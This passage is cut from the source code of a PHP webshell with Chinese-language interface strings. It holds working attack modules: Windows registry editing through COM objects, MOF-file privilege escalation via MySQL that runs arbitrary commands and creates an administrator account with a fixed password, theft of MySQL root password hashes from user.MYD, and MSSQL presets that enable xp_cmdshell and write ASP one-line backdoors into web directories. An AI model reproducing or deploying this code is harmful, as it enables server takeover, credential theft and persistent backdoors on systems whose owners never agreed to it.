<input class="bt" type="submit" value="\xd0\xb4\xc8\xeb"></form></TD></TR><br><br><br></div>   
END;
                $wpath = isset($_POST['wpath']) ? $_POST['wpath'] : '';
                $wpath = str_replace("\\\\", "\\", $wpath);
                $wtype = isset($_POST['wtype']) ? $_POST['wtype'] : '';
                $wvalue = isset($_POST['wvalue']) ? $_POST['wvalue'] : '';
                if ($action == "write") {
                    $shell1->RegWrite($wpath, $wvalue, $wtype);
                }
                print <<<END
<TR><form   action=""   method="post">   
<div><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>  
Dpath:<input type="hidden" name="action" value="del">   
<input type="text" name="dpath" value="{$dpath}" size="70">   
<input class="bt" type="submit" value="\xc9\xbe\xb3\xfd"></form></TD></TR><br><br></div>   
END;
                $dpath = isset($_POST['dpath']) ? $_POST['dpath'] : '';
                $dpath = str_replace("\\\\", "\\", $dpath);
                if ($action == "del") {
                    $out = $shell1->RegDelete($dpath);
                }
            } else {
                $tip = "\xbe\xdd\xb2\xe2\xca\xd4\xb1\xbe\xb9\xa6\xc4\xdc\xbf\xc9\xd3\xc3\xb5\xc4\xbf\xc9\xc4\xdc\xd0\xd4\xce\xaa\xcd\xf2\xb7\xd6\xd6\xae\xd2\xbb<br>Webshell\xcb\xf9\xd4\xda\xb7\xfe\xce\xf1\xc6\xf7\xb1\xd8\xd0\xeb\xce\xaaWindows\xcf\xb5\xcd\xb3<br>PHP\xcc\xe1\xc8\xa8\xba\xdc\xc1\xe9\xbb\xee\xa3\xac\xb5\xab\xc4\xe3\xd4\xda\xb7\xc7\xb3\xa3\xce\xde\xc4\xce\xb5\xc4\xca\xb1\xba\xf2\xbf\xc9\xd2\xd4\xb3\xa2\xca\xd4\xb1\xbe\xb9\xa6\xc4\xdc<br></h5><br><br><br>";
                print "<div class=\"actall\"><pre>\r\n<br><a href=\"?eanver=winapi&winshell=wscript\"> [ WScript\xd7\xe9\xbc\xfe ] </a><br><br>\r\n<h5>\xb1\xbe\xb9\xa6\xc4\xdc\xca\xb9\xd3\xc3PHP\xb5\xf7\xd3\xc3Windows\xd7\xe9\xbc\xfe\xd6\xd0\xb5\xc4Wscript\xd7\xe9\xbc\xfe\xa1\xa3<br>\r\nWscript\xce\xaa\xb5\xf7\xd3\xc3cmd\xc3\xfc\xc1\xee\xd7\xe9\xbc\xfe<br>\xbe\xdd\xb2\xe2\xca\xd4\xb1\xbe\xb9\xa6\xc4\xdc\xbf\xc9\xd3\xc3\xb5\xc4\xbf\xc9\xc4\xdc\xd0\xd4\xce\xaa\xcd\xf2\xb7\xd6\xd6\xae\xd2\xbb<br>Webshell\xcb\xf9\xd4\xda\xb7\xfe\xce\xf1\xc6\xf7\xb1\xd8\xd0\xeb\xce\xaaWindows\xcf\xb5\xcd\xb3<br>PHP\xcc\xe1\xc8\xa8\xba\xdc\xc1\xe9\xbb\xee\xa3\xac\xb5\xab\xc4\xe3\xd4\xda\xb7\xc7\xb3\xa3\xce\xde\xc4\xce\xb5\xc4\xca\xb1\xba\xf2\xbf\xc9\xd2\xd4\xb3\xa2\xca\xd4\xb1\xbe\xb9\xa6\xc4\xdc<br></h5><br><br><br><a href=\"?eanver=winapi&winshell=shelluser\"> [ Shell.User\xd7\xe9\xbc\xfe ] </a><br><br>\r\n<h5>\xb1\xbe\xb9\xa6\xc4\xdc\xca\xb9\xd3\xc3PHP\xb5\xf7\xd3\xc3Windows\xd7\xe9\xbc\xfe\xd6\xd0\xb5\xc4Shell.user\xd7\xe9\xbc\xfe<br>\r\nUSER\xd7\xe9\xbc\xfe\xce\xaaWindows\xcf\xb5\xcd\xb3\xd3\xc3\xbb\xa7\xb2\xd9\xd7\xf7\xcf\xe0\xb9\xd8\xd7\xe9\xbc\xfe<br>\xbe\xdd\xb2\xe2\xca\xd4\xb1\xbe\xb9\xa6\xc4\xdc\xbf\xc9\xd3\xc3\xb5\xc4\xbf\xc9\xc4\xdc\xd0\xd4\xce\xaa\xcd\xf2\xb7\xd6\xd6\xae\xd2\xbb<br>Webshell\xcb\xf9\xd4\xda\xb7\xfe\xce\xf1\xc6\xf7\xb1\xd8\xd0\xeb\xce\xaaWindows\xcf\xb5\xcd\xb3<br>PHP\xcc\xe1\xc8\xa8\xba\xdc\xc1\xe9\xbb\xee\xa3\xac\xb5\xab\xc4\xe3\xd4\xda\xb7\xc7\xb3\xa3\xce\xde\xc4\xce\xb5\xc4\xca\xb1\xba\xf2\xbf\xc9\xd2\xd4\xb3\xa2\xca\xd4\xb1\xbe\xb9\xa6\xc4\xdc<br></h5><br><br><br><a href=\"?eanver=winapi&winshell=regedit\"> [ \xd7\xa2\xb2\xe1\xb1\xed\xb2\xd9\xd7\xf7 ] </a><br><br>\r\n<h5>\xb1\xbe\xb9\xa6\xc4\xdc\xca\xb9\xd3\xc3PHP\xb5\xf7\xd3\xc3Windows\xd7\xe9\xbc\xfe\xd6\xd0\xb5\xc4Shell.Wscript\xd7\xe9\xbc\xfe<br>\r\n<h5><font color=red>\xb1\xbe\xb9\xa6\xc4\xdc\xbf\xc9\xb6\xc1\xc8\xa1\xa3\xac\xd0\xb4\xc8\xeb\xa3\xac\xc9\xbe\xb3\xfd\xd7\xa2\xb2\xe1\xb1\xed\xb2\xd9\xd7\xf7</font>\r\nRegRead()\xba\xaf\xca\xfd\xb6\xc1\xc8\xa1\xcf\xb5\xcd\xb3\xd7\xa2\xb2\xe1\xb1\xed\xc4\xda\xc8\xdd<br>\xbe\xdd\xb2\xe2\xca\xd4\xb1\xbe\xb9\xa6\xc4\xdc\xbf\xc9\xd3\xc3\xb5\xc4\xbf\xc9\xc4\xdc\xd0\xd4\xce\xaa\xcd\xf2\xb7\xd6\xd6\xae\xd2\xbb<br>Webshell\xcb\xf9\xd4\xda\xb7\xfe\xce\xf1\xc6\xf7\xb1\xd8\xd0\xeb\xce\xaaWindows\xcf\xb5\xcd\xb3<br>PHP\xcc\xe1\xc8\xa8\xba\xdc\xc1\xe9\xbb\xee\xa3\xac\xb5\xab\xc4\xe3\xd4\xda\xb7\xc7\xb3\xa3\xce\xde\xc4\xce\xb5\xc4\xca\xb1\xba\xf2\xbf\xc9\xd2\xd4\xb3\xa2\xca\xd4\xb1\xbe\xb9\xa6\xc4\xdc<br></h5><br><br><br></pre></div>";
            }
            //}
            break;
        case "mofshell":
            session_start();
            if (!empty($_POST['submit'])) {
                setcookie("connect");
                setcookie("connect[host]", $_POST['host']);
                setcookie("connect[user]", $_POST['user']);
                setcookie("connect[pass]", $_POST['pass']);
                setcookie("connect[dbname]", $_POST['dbname']);
                setcookie("connect[path]", $_POST['path']);
                echo "<script>location.href='?eanver=mofshell&action=connect'</script>";
            }
            if (empty($_GET["action"])) {
                echo "<form action='?eanver=mofshell&action=connect' method='post'>";
                echo "ip:";
                echo "<div class='actall'><input type='text' name='host' value='localhost:3306'><br/></div>";
                echo "\xd5\xca\xbb\xa7:";
                echo "<div class='actall'><input type='text' name='user' value='root'><br/></div>";
                echo "\xc3\xdc\xc2\xeb:";
                echo "<div class='actall'><input type='password' name='pass' value='123456'><br/></div>";
                echo "\xbf\xe2\xc3\xfb:";
                echo "<div class='actall'><input type='text' name='dbname' value='mysql'><br/></div>";
                echo "\xbf\xc9\xd0\xb4\xc4\xbf\xc2\xbc(''savefile''\xca\xc7\xce\xc4\xbc\xfe\xc3\xfb):";
                echo "<div class='actall'><input type='text' name='path' value='c:/recycler/savefile'><br/></div>";
                echo "<div class='actall'><input type='submit' name='submit' value='\xcc\xe1\xbd\xbb'><br/></div>";
                echo "</form>";
                echo "<div class='actall'>ps:mof\xcc\xe1\xc8\xa8\xca\xca\xd3\xc3\xd3\xdawindows\xb7\xfe\xce\xf1\xc6\xf7<br>1:mof\xcc\xe1\xc8\xa8\xd2\xc0\xbf\xbfwscript.shell\xd7\xe9\xbd\xa8\xd6\xb4\xd0\xd0\xc3\xfc\xc1\xee\xba\xcdshell.users\xbc\xd3\xd3\xc3\xbb\xa7<br>2:\xbb\xd8\xcf\xd4\xc3\xfc\xc1\xee\xd3\xd0\xca\xb1\xb2\xbb\xbf\xc9\xd3\xc3\xa3\xac\xb5\xab\xb2\xbb\xd3\xb0\xcf\xec\xd6\xb4\xd0\xd0\xd0\xa7\xb9\xfb<br>3:\xb1\xbe\xb9\xa6\xc4\xdc\xd6\xa7\xb3\xd6wscript.shell\xba\xcdshell.user\xcb\xab\xd6\xd8\xcc\xe1\xc8\xa8<br>4:\xd6\xb4\xd0\xd0\xcd\xea\xb1\xcf\xba\xf3\xc7\xeb\xb5\xc8\xb4\xfd\xd0\xa9\xca\xb1\xbc\xe4\xd4\xd9\xb2\xe9\xbf\xb4\xbd\xe1\xb9\xfb<br>5:2\xd6\xd6\xb7\xbd\xca\xbd\xb2\xbb\xc4\xdc\xcd\xac\xd2\xbb\xca\xb1\xbc\xe4\xd6\xb4\xd0\xd0\xa3\xac\xc7\xeb\xc4\xcd\xd0\xc4\xb5\xc8\xb4\xfd\xbd\xe1\xb9\xfb\xba\xf3\xd4\xd9\xd6\xb4\xd0\xd0\xc6\xe4\xcb\xfb\xb9\xa6\xc4\xdc<br><br>\xb2\xbb\xcd\xa3\xbc\xd3\xd5\xca\xbb\xa7\xbd\xe2\xbe\xf6\xb0\xec\xb7\xa8:<br>";
                echo "\r\n\xb5\xda\xd2\xbb net stop winmgmt \xcd\xa3\xd6\xb9\xb7\xfe\xce\xf1\xa3\xac<br>\r\n\xb5\xda\xb6\xfe \xc9\xbe\xb3\xfd\xce\xc4\xbc\xfe\xbc\xd0\xa3\xbaC:\\WINDOWS\\system32\\wbem\\Repository\\<br>\r\n\xb5\xda\xc8\xfd net start winmgmt \xc6\xf4\xb6\xaf\xb7\xfe\xce\xf1<br>\r\n\xb5\xda\xcb\xc4\xa3\xba\xcd\xea\xb1\xcf\xb2\xbb\xbb\xe1\xd4\xda\xd6\xb4\xd0\xd0\xc1\xcb\xa1\xa3<br>\r\nC:\\WINDOWS\\system32\\wbem\\Repository\\ \xb7\xc5\xb5\xc4\xca\xc7\xb4\xa2\xb4\xe6\xbf\xe2\xa1\xa1\xce\xd2\xc3\xc7\xd6\xb4\xd0\xd0\xb5\xc4.mof\xb6\xbc\xbb\xe1\xb1\xbb\xbc\xd3\xc8\xeb\xb5\xbd\xd5\xe2\xb8\xf6\xbf\xe2\xc1\xcb\xa1\xa3<br>\r\n\xc8\xbb\xba\xf3\xd2\xbb\xd6\xb1\xb0\xb4\xbd\xc5\xb1\xbe\xc9\xe8\xd6\xc3\xb5\xc4\xca\xb1\xbc\xe4\xd6\xb4\xd0\xd0\xa1\xa3\xa1\xa3<br>\r\n\xc9\xbe\xb3\xfd\xba\xf3\xa1\xa1\xd6\xd8\xd0\xc2\xc6\xf4\xb6\xaf\xa1\xa1\xbb\xe1\xd6\xd8\xbd\xa8\xb8\xf6\xc4\xac\xc8\xcf\xb4\xa2\xb4\xe6\xbf\xe2\xa1\xa1\xd5\xe2\xd1\xf9\xce\xd2\xc3\xc7\xcf\xc8\xc7\xb0\xd6\xb4\xd0\xd0mof\xbe\xcd\xc3\xbb\xc1\xcb\xa1\xa3</div>";
                exit;
            }
            if ($_GET[action] == 'connect') {
                $conn = mysql_connect($_COOKIE["connect"]["host"], $_COOKIE["connect"]["user"], $_COOKIE["connect"]["pass"]) or die('<pre>' . mysql_error() . '</pre>');
                echo "<form action='' method='post'>";
                echo "<div class='actall'>Cmd:";
                echo "<input type='text' style='width:400' name='cmd' value='{$strCmd}'?></div>";
                echo "<div class='actall'><input type='submit' value='  wscript\xd6\xb4\xd0\xd0\xc3\xfc\xc1\xee  '>";
                echo "</form><br><br>";
                echo "<form action='' method='post'>";
                echo "<input type='hidden' name='flag' value='flag'>";
                echo "<input type='submit'value='\xb6\xc1\xc8\xa1wscript\xd6\xb4\xd0\xd0\xbd\xe1\xb9\xfb'></div>";
                echo "</form>";
                echo "<hr>";
                echo "<form action='' method='post'>";
                echo "<input type='hidden' name='shelluser' value='shelluser'>";
                echo "<div class='actall'><input type='submit' value=' shelluser\xcc\xed\xbc\xd3\xd5\xca\xbb\xa7  '></div>";
                echo "</form>";
                if (isset($_POST['cmd'])) {
                    $strCmd = $_POST['cmd'];
                    $cmdshell = 'cmd /c ' . $strCmd . '>' . $_COOKIE["connect"]["path"];
                    $mofname = "c:/windows/system32/wbem/mof/system.mof";
                    $payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\")\r\n \r\ninstance of __EventFilter as \$EventFilter\r\n{\r\n  EventNamespace = \"Root\\\\\\\\Cimv2\";\r\n  Name  = \"filtP2\";\r\n  Query = \"Select * From __InstanceModificationEvent \"\r\n      \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \"\r\n      \"And TargetInstance.Second = 5\";\r\n  QueryLanguage = \"WQL\";\r\n};\r\n \r\ninstance of ActiveScriptEventConsumer as \$Consumer\r\n{\r\n  Name = \"consPCSV2\";\r\n  ScriptingEngine = \"JScript\";\r\n  ScriptText =\r\n  \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"{$cmdshell}\\\\\")\";\r\n };\r\n \r\ninstance of __FilterToConsumerBinding\r\n{\r\n  Consumer = \$Consumer;\r\n  Filter = \$EventFilter;\r\n};";
                    mysql_select_db($_COOKIE["connect"]["dbname"], $conn);
                    $sql1 = "select '{$payload}' into dumpfile '{$mofname}';";
                    if (mysql_query($sql1)) {
                        echo "<hr>\xd6\xb4\xd0\xd0\xcd\xea\xb1\xcf!<br> \xc7\xeb\xb5\xe3\xbb\xf7\"\xb6\xc1\xc8\xa1wscript\xd6\xb4\xd0\xd0\xbd\xe1\xb9\xfb\"\xb2\xe9\xbf\xb4\xbd\xe1\xb9\xfb!!<br>\xb2\xbb\xb3\xc9\xb9\xa6\xb6\xe0\xd6\xb4\xd0\xd0\xbc\xb8\xb4\xce\xa1\xa3<br>ps:wscript\xd6\xb4\xd0\xd0\xd0\xe8\xd2\xaawscript.shell\xd7\xe9\xbd\xa8\xb4\xe6\xd4\xda\xa1\xa3<hr>";
                    } else {
                        die(mysql_error());
                    }
                    mysql_close($conn);
                }
                if (isset($_POST['flag'])) {
                    $conn = mysql_connect($_COOKIE["connect"]["host"], $_COOKIE["connect"]["user"], $_COOKIE["connect"]["pass"]) or die('<pre>' . mysql_error() . '</pre>');
                    $sql2 = "select load_file(\"" . $_COOKIE["connect"]["path"] . "\");";
                    $result2 = mysql_query($sql2);
                    $num = mysql_num_rows($result2);
                    while ($row = mysql_fetch_array($result2, MYSQL_NUM)) {
                        echo "<hr/>";
                        echo '<pre>' . $row[0] . '</pre>';
                    }
                    mysql_close($conn);
                }
                if (isset($_POST['shelluser'])) {
                    $mofname = "c:/windows/system32/wbem/mof/system.mof";
                    $payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\")\r\n \r\ninstance of __EventFilter as \$EventFilter\r\n{\r\n  EventNamespace = \"Root\\\\\\\\Cimv2\";\r\n  Name  = \"filtP2\";\r\n  Query = \"Select * From __InstanceModificationEvent \"\r\n      \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \"\r\n      \"And TargetInstance.Second = 5\";\r\n  QueryLanguage = \"WQL\";\r\n};\r\n \r\ninstance of ActiveScriptEventConsumer as \$Consumer\r\n{\r\n  Name = \"consPCSV2\";\r\n  ScriptingEngine = \"JScript\";\r\n  ScriptText =  \r\n\"var WSH = new ActiveXObject(\\\\\"Shell.Users\\\\\")\\\\nz=WSH.create(\\\\\"MofNewUser\\\\\")\\\\nz.changePassword(\\\\\"ASDfg123!@#...\\\\\", \\\\\"\\\\\")\\\\nz.setting(\\\\\"AccountType\\\\\")=3\";\r\n };\r\n \r\ninstance of __FilterToConsumerBinding\r\n{\r\n  Consumer = \$Consumer;\r\n  Filter = \$EventFilter;\r\n};";
                    mysql_select_db($_COOKIE["connect"]["dbname"], $conn);
                    $sql1 = "select '#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\")\r\n \r\ninstance of __EventFilter as \$EventFilter\r\n{\r\n  EventNamespace = \"Root\\\\\\\\Cimv2\";\r\n  Name  = \"filtP2\";\r\n  Query = \"Select * From __InstanceModificationEvent \"\r\n      \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \"\r\n      \"And TargetInstance.Second = 5\";\r\n  QueryLanguage = \"WQL\";\r\n};\r\n \r\ninstance of ActiveScriptEventConsumer as \$Consumer\r\n{\r\n  Name = \"consPCSV2\";\r\n  ScriptingEngine = \"JScript\";\r\n  ScriptText =  \r\n\"var WSH = new ActiveXObject(\\\\\"Shell.Users\\\\\")\\\\nz=WSH.create(\\\\\"MofNewUser\\\\\")\\\\nz.changePassword(\\\\\"ASDfg123!@#...\\\\\", \\\\\"\\\\\")\\\\nz.setting(\\\\\"AccountType\\\\\")=3\";\r\n };\r\n \r\ninstance of __FilterToConsumerBinding\r\n{\r\n  Consumer = \$Consumer;\r\n  Filter = \$EventFilter;\r\n};' into dumpfile 'c:/windows/system32/wbem/mof/system.mof';";
                    if (mysql_query($sql1)) {
                        echo "<hr>\xd6\xb4\xd0\xd0\xcc\xed\xbc\xd3\xcd\xea\xb1\xcf,\xd5\xca\xbb\xa7\xa3\xbaMofNewUser \xc3\xdc\xc2\xeb\xa3\xbaASDfg123!@#...    <br>ps:ShellUser\xcc\xed\xbc\xd3\xce\xde\xbb\xd8\xcf\xd4\xb9\xa6\xc4\xdc,\xc7\xeb5\xb7\xd6\xd6\xd3\xba\xf3\xd7\xd4\xd0\xd0\xb2\xe9\xbf\xb4\xbd\xe1\xb9\xfb<hr>";
                    } else {
                        die(mysql_error());
                    }
                    mysql_close($conn);
                }
            }
            break;
        case "readpass":
            if (isset($_POST['sub'])) {
                $name = $_POST['name'];
                $pass = $_POST['password'];
                $host = $_POST['host'];
                $db = $_POST['db'];
                $link = mysql_connect($host, $name, $pass);
                if (!link) {
                    die("could not connect" . mysql_error());
                }
                if (!mysql_select_db($db, $link)) {
                    die("db" . mysql_error());
                }
                $db_path_sql = "select @@basedir";
                if ($n = mysql_query($db_path_sql)) {
                    $db_path_rs = mysql_fetch_array($n);
                    $db_path = str_replace("\\", "/", $db_path_rs[0]);
                }
                $dropmoon = 'DROP table moon';
                $sql = "CREATE TABLE moon (`code` TEXT NOT NULL ) ENGINE = MYISAM CHARACTER SET utf8 COLLATE utf8_general_ci;";
                $exp = "LOAD DATA LOCAL INFILE '" . $db_path . "data/mysql/user.MYD' INTO TABLE moon fields terminated by '' LINES TERMINATED BY '\x00';";
                $select = "SELECT code FROM moon";
                $pass = "";
                mysql_query($dropmoon);
                if (mysql_query($sql)) {
                    if ($row = mysql_query($exp)) {
                        if ($row = mysql_query($select)) {
                            while ($rows = mysql_fetch_array($row)) {
                                echo $pass .= $rows['code'];
                            }
                        }
                    }
                }
            } else {
                echo "<form action=\"\" method=\"post\">";
                echo "<h3>MYSQL\xb5\xcd\xc8\xa8\xcf\xde\xb6\xc1\xc8\xa1ROOT\xc3\xdc\xc2\xeb\xb9\xa4\xbe\xdf</h3>";
                echo "<div class=\"actall\">ip\xa3\xba&nbsp;&nbsp;&nbsp;<input type=\"text\" name=\"host\" value=\"localhost\"><br></div>";
                echo "<div class=\"actall\">\xd5\xca\xbb\xa7\xa3\xba<input type=\"text\" name=\"name\" value=\"root\"><br></div>";
                echo "<div class=\"actall\">\xc3\xdc\xc2\xeb\xa3\xba<input type=\"text\" name=\"password\"><br></div>";
                echo "<div class=\"actall\">\xbf\xe2\xc3\xfb\xa3\xba<input type=\"text\" name=\"db\" value=\"mysql\"></div>";
                echo "<div class=\"actall\">&nbsp&nbsp<input type=\"submit\" value=\"    \xb6\xc1\xc8\xa1    \" name=\"sub\"></div>";
            }
            break;
        case "othersql":
            //�����ݿ���
            //function otherdb(){
            $db = isset($_GET['db']) ? $_GET['db'] : 'ms';
            print <<<END
<form method="POST" name="dbform" id="dbform" action="?eanver=othersql&db={$db}" enctype="multipart/form-data">
<div class="actall">
<a href="?eanver=othersql&db=ms"> &nbsp; MSSQL &nbsp;</a>
<a href="?eanver=othersql&db=ora"> &nbsp; Oracle &nbsp;</a>
<a href="?eanver=othersql&db=ifx"> &nbsp; InforMix &nbsp;</a>
<a href="?eanver=othersql&db=fb"> &nbsp; FireBird &nbsp;</a>
<a href="?eanver=othersql&db=db2">&nbsp; DB2 &nbsp;</a></div></form>
END;
            if ($db == "ms") {
                $mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost';
                $msuser = isset($_POST['msuser']) ? $_POST['msuser'] : 'sa';
                $mspass = isset($_POST['mspass']) ? $_POST['mspass'] : '';
                $msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master';
                $msaction = isset($_POST['action']) ? $_POST['action'] : '';
                $msquery = isset($_POST['mssql']) ? $_POST['mssql'] : '';
                $msquery = stripslashes($msquery);
                print <<<END
<div class="actall">
<form method="POST" name="msform" action="?eanver=othersql&db=ms">
\xd6\xf7\xbb\xfa\xa3\xba<input type="text" name="mshost" value="{$mshost}" style="width:100px">
\xd5\xca\xbb\xa7:<input type="text" name="msuser" value="{$msuser}" style="width:100px">
\xc3\xdc\xc2\xeb:<input type="text" name="mspass" value="{$mspass}" style="width:100px">
\xbf\xe2\xc3\xfb:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br>
<script language="javascript">
function msFull(i){
Str = new Array(11);
Str[0] = "";
Str[1] = "select @@version;";
Str[2] = "select name from sysdatabases;";
Str[3] = "select name from sysobject where type='U';";
Str[4] = "select name from syscolumns where id=Object_Id('table_name');";
Str[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');";
Str[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');";
Str[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
Str[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
Str[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
Str[10] = "Exec master.dbo.xp_cmdshell 'net user';";
Str[11] = "Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';";
Str[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' ";
msform.mssql.value = Str[i];
return true;
}
</script>
<textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br>
<select onchange="return msFull(options[selectedIndex].value)">
<option value="0" selected>\xd6\xb4\xd0\xd0\xc3\xfc\xc1\xee</option>
<option value="1">\xcf\xd4\xca\xbe\xb0\xe6\xb1\xbe</option>
<option value="2">\xca\xfd\xbe\xdd\xbf\xe2</option>
<option value="3">\xb1\xed\xb6\xce</option>
<option value="4">\xd7\xd6\xb6\xce</option>
<option value="5">sp_oacreate</option>
<option value="6">xp_cmdshell</option>
<option value="7">xp_cmdshell(2005)</option>
<option value="8">sp_oacreate(2005)</option>
<option value="9">\xb4\xf2\xbf\xaaopenrowset(2005)</option>
<option value="10">xp_cmdshell exec</option>
<option value="10">sp_oamethod exec</option>
<option value="11">sp_makewebtask</option>
</select>
<input type="hidden" name="action" value="msquery">
<input class="bt" type="submit" value="\xd6\xb4\xd0\xd0"></form></div>
END;
                if ($msaction == 'msquery') {
                    $msconn = mssql_connect($mshost, $msuser, $mspass);
                    mssql_select_db($msdbname, $msconn) or die("connect error :" . mssql_get_last_message());
                    $msresult = mssql_query($msquery) or die(mssql_get_last_message());
                    echo "<font face=\"verdana\"><table border=\"1\" cellpadding=\"1\" cellspacing=\"2\">\n<tr>\n";
                    for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
                        echo '<td><b>' . mssql_field_name($msresult, $i) . "</b></td>\n";
                    }
                    echo "</tr>\n";
                    mssql_data_seek($result, 0);
                    while ($msrow = mssql_fetch_row($msresult)) {
                        echo "<tr>\n";
                        for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
                            echo '<td>' . "{$msrow[$i]}" . '</td>';
                        }
                        echo "</tr>\n";
                    }
                    echo "</table></font>";
                    mssql_free_result($msresult);
                    mssql_close();
                }
            } elseif ($db == "ora") {
                $orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost';
                $oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521';
                $orauser = isset($_POST['orauser']) ? $_POST['orauser'] : 'root';
                $orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '123456';
                $orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL';
                $oraaction = isset($_POST['action']) ? $_POST['action'] : '';
                $oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : '';
                $oraquery = stripslashes($oraquery);
                print <<<END
<form method="POST" name="oraform" action="?eanver=othersql&db=ora">
<div class="actall">
\xd6\xf7\xbb\xfa:<input type="text" name="orahost" value="{$orahost}" style="width:100px">
\xb6\xcb\xbf\xda:<input type="text" name="oraport" value="{$oraport}" style="width:50px">
\xd5\xca\xbb\xa7:<input type="text" name="orauser" value="{$orauser}" style="width:80px">
\xc3\xdc\xc2\xeb:<input type="text" name="orapass" value="{$orapass}" style="width:100px">
SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br>
<script language="javascript">
function oraFull(i){
Str = new Array(5);
Str[0] = "";
Str[1] = "select version();";
Str[2] = "SELECT NAME FROM V{$DATABASE}";
Str[3] = "select * From all_objects where object_type='TABLE'";
Str[4] = "select column_name from user_tab_columns where table_name='table1'";
oraform.orasql.value = Str[i];
return true;
}
</script>
<textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br>
<select onchange="return oraFull(options[selectedIndex].value)">
<option value="0" selected>\xd6\xb4\xd0\xd0\xc3\xfc\xc1\xee</option>
<option value="1">\xcf\xd4\xca\xbe\xb0\xe6\xb1\xbe</option>
<option value="2">\xca\xfd\xbe\xdd\xbf\xe2</option>
<option value="3">\xb1\xed\xb6\xce</option>
<option value="4">\xd7\xd6\xb6\xce</option>
</select>
<input type="hidden" name="action" value="myquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
                if ($oraaction == 'oraquery') {
                    $oralink = OCILogon($orauser, $orapass, "(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST={$orahost})(PORT = {$oraport}))(CONNECT_DATA =(SID={$orasid})))") or die(ocierror());
                    $oraresult = ociparse($oralink, $oraquery) or die(ocierror());
                    $orarow = oci_fetch_row($oraresult);
                    echo "<font face=\"verdana\"><table border=\"1\" cellpadding=\"1\" cellspacing=\"2\">\n<tr>\n";
                    for ($i = 0; $i < oci_num_fields($oraresult); $i++) {
                        echo '<td><b>' . oci_field_name($oraresult, $i) . "</b></td>\n";
                    }
                    echo "</tr>\n";
                    ociresult($oraresult, 0);
                    while ($orarow = ora_fetch_row($oraresult)) {
                        echo "<tr>\n";
                        for ($i = 0; $i < ora_num_fields($result); $i++) {
                            echo '<td>' . "{$orarow[$i]}" . '</td>';
                        }
                        echo "</tr>\n";
                    }
                    echo "</table></font>";
                    oci_free_statement($oraresult);
                    ocilogoff();
                }
            } elseif ($db == "ifx") {
                $ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : 'root';
                $ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '123456';
                $ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb';
                $ifxaction = isset($_POST['action']) ? $_POST['action'] : '';
                $ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : '';
                $ifxquery = stripslashes($ifxquery);
                print <<<END
<form method="POST" name="ifxform" action="?eanver=othersql&db=ifx">
<div class="actall">\xbf\xe2\xc3\xfb:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px">
\xd5\xca\xbb\xa7:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px">
\xc3\xdc\xc2\xeb:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br>
<script language="javascript">
function ifxFull(i){
Str = new Array(11);
Str[0] = "";
Str[1] = "select dbservername from sysobjects;";
Str[2] = "select name from sysdatabases;";
Str[3] = "select tabname from systables;";
Str[4] = "select colname from syscolumns where tabid=n;";
Str[5] = "select username,usertype,password from sysusers;";
ifxform.ifxsql.value = Str[i];
return true;
}
</script>
<textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br>
<select onchange="return ifxFull(options[selectedIndex].value)">
<option value="0" selected>\xd6\xb4\xd0\xd0\xc3\xfc\xc1\xee</option>
<option value="1">\xca\xfd\xbe\xdd\xbf\xe2\xb7\xfe\xce\xf1\xc6\xf7\xc3\xfb\xb3\xc6</option>
<option value="1">\xca\xfd\xbe\xdd\xbf\xe2</option>
<option value="2">\xb1\xed\xb6\xce</option>
<option value="3">\xd7\xd6\xb6\xce</option>
<option value="4">hashes</option>
</select>
<input type="hidden" name="action" value="ifxquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
                if ($ifxaction == 'ifxquery') {
                    $ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg());
                    $ifxresult = ifx_query($ifxquery, $ifxlink) or die(ifx_errormsg());
                    $ifxrow = ifx_fetch_row($ifxresult);
                    echo "<font face=\"verdana\"><table border=\"1\" cellpadding=\"1\" cellspacing=\"2\">\n<tr>\n";
